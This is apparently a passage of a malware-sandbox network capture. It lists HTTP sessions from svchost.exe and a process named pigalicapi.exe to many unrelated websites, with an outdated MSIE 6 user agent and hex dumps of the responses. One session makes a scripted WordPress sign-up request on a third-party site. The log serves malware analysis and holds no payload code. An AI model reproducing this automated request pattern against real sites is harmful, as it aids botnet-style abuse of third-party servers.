                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6112INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6128INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6144INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6160INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          56192.168.2.6509191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6111OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6165INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:09:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6165INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6182INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6198INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6214INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 35 30 32 36 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 39 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.045026 / WebAdministrator (05.07.2023 08:09) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          57192.168.2.65171188.114.97.7443C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6144OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6181INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:47 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7JLze9cur1bM87dFPlet61riWS%2FEaL5xOxRgg%2FNC9fc4zyLCKnz5EgxaQtzAiQ2TljiKIhryyOZGS%2B5BPQG4Wf73bfBnbl7NJL9dtwcY1JYxznhTrMIYyR30"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6dffead53686-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6182INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6182INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          58192.168.2.65201104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6164OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6363INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:56 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:56 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bYeNrBDIBblPbm2Ckm%2BEkB6zl6DaqrAPxQKxG4eAQgTUzn%2BqaHAo0%2BprUOJjWL0vlfzf71BZLx%2BmlGSRfnieLWJy8RiwQTJcDNxkD8Dgaot8VCfF%2FkfhOeW2V17uxJ2Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e003b6b2baf-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6364INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6364INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          59192.168.2.6521594.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6164OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6164INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6165INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          6192.168.2.650197185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC89OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC89INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:07 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC89INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          60192.168.2.6522383.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6164OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6572INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                          Content-Length: 49050
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6573INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
